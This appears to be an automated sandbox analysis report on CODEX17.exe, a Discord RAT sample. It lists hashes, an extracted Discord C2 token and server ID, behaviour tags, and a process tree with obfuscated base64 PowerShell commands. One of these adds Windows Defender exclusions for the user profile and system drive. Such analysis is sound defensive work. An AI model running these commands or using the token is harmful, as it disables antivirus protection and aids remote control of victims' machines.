Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    11-12-2024 14:17

General

  • Target

    CODEX17.exe

  • Size

    307KB

  • MD5

    53cc7337eed07bbbe0172f0b64bc6245

  • SHA1

    9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0

  • SHA256

    1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058

  • SHA512

    ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d

  • SSDEEP

    6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q

  • server_id

    1316071968298111026

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CODEX17.exe
    "C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2820 -s 596
        3⤵
        • Loads dropped DLL
        PID:2292

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Client-built.exe

    Filesize

    78KB

    MD5

    eef37e61081aca867be51dab8d02c732

    SHA1

    b58736f3eb07dedd144e61a8e38802de1c15b947

    SHA256

    d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8

    SHA512

    08555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    33be2dcdbaf814b56fcf254b98ccd4b9

    SHA1

    40553bd037a0afb4f247759a83424f9bf3570e39

    SHA256

    28f11dd0b5b11213fa68754a0f026ba6f372d9a6020d233681f993834df98aa5

    SHA512

    d904c4aa36423d21833e1aa9c7f8f4f3df61c4d00b611445bd219488608750c8db2b4806a6a9eb715a94d9ab5b6c33e710c3250c69e1db9d24876a275fc52718

  • memory/2108-2-0x0000000073B61000-0x0000000073B62000-memory.dmp

    Filesize

    4KB

  • memory/2108-3-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-5-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-4-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-6-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-24-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-25-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2820-13-0x000000013FA20000-0x000000013FA38000-memory.dmp

    Filesize

    96KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.